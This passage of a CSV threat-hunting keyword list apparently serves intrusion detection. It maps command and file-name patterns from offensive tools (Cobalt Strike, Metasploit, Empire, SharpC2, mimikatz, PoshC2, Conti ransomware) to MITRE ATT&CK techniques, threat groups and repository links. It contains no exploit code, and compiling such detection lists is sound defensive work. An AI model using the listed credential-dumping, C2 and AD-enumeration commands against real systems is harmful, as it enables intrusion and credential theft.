TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*stager_bind_tcp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*stager_bind_tcp*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*stager_hidden_bind_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*stager_sock_find.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*stagers/*/aes.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stagers/*/diffiehellman.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stagers/*/get_sysinfo.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stagers/*/rc4.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Stagers\ExeStager\*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*Stagers\SvcStager\*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*stagerx64.bin*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*standard::answer*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::base64*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::cd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::cls*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::coffee*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::exit*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::hostname*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::localtime*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::log*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::sleep*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standard::version*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*standin --asrep*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --dc*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --delegation*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --group *Domain Admins*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --object *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*standin --spn*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*StarFighters*","offensive_tool_keyword","StarFighters","A JavaScript and VBScript Based Empire Launcher - by Cn33liz 2017","T1059 - T1055 - T1218 - T1027","TA0002 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/StarFighters","1","0","N/A","N/A","4","320","66","2017-06-05T19:18:38Z","2017-06-05T18:28:22Z" +"*Starkiller*","offensive_tool_keyword","Starkiller","Starkiller is a Frontend for Powershell Empire. It is an Electron application written in VueJS. If you'd like to contribute please follow the Contribution guide. If you'd like to request a feature or report a bug. please follow the Issue template.","T1105 - T1210 - T1059 - T1027 - T1035","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","C2","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","10","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" +"*StarkillerSnackbar.vue*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" +"*staroffice2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Start Menu\Programs\Startup\Loader.exe*","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0005 ","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","72","17","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" +"*start PsExec.exe -d *","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard 